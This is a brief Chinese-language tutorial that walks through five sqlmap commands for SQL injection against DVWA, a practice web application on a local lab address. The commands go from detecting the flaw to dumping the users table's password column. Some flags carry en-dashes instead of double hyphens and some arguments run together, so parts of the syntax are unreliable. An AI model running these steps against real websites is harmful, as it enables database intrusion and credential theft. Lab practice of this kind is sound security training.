1、通过sqlmap进行注入攻击:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'
2、通过sqlmap获取数据库名:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'--dbs -v 0
3、通过sqlmap获取表名;
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa –tables
4、通过sqlmap获取列名:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140' -D dvwa --tables -T users –columns
5、通过sqlmap导出password列的内容:
root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa --tables -T users --columns –dump